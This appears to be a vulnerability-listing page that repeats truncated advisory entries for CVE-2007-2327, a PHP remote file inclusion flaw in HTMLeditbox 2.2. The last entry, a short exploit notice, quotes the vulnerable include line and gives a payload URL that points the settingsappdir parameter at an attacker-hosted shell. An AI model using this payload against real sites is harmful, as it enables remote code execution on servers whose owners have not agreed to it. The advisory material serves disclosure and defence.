EUVD-2007-2322

Malware in sbrugna...

HTMLEditBox 2.2 Config.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23664/info htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to execute malicious PHP code in the context ...

CVE-2007-2327

PHP remote file inclusion vulnerability in editor.php in HTMLeditbox 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the settingsappdir parameter...

Remote file inclusion

PHP remote file inclusion vulnerability in editor.php in HTMLeditbox 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the settingsappdir parameter...

CVE-2007-2327

CVE-2007-2327 affects HTMLeditbox 2.2. The vulnerability is a PHP remote file inclusion in _editor.php triggered by a URL in settings[app_dir], allowing remote code execution. Root cause is improper handling of the app_dir parameter enabling inclusion of attacker-controlled PHP. Exploitation deta...

CVE-2007-2327

PHP remote file inclusion vulnerability in editor.php in HTMLeditbox 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the settingsappdir parameter...

HTMLEditBox 2.2 - config.php Remote File Inclusion

HTMLEditBox 2.2 - config.php Remote File Inclusion source: https://www.securityfocus.com/bid/23664/info htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit this vulnerability to execute malicious PHP cod...

HTMLeditbox & 2.2 >> RFI

+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,dNetGuru bug : editor.php @include$settingsappdir.'/inc/config.php'; exploit : http://victim/editor.php?settingsappdir=http://shell ++++++...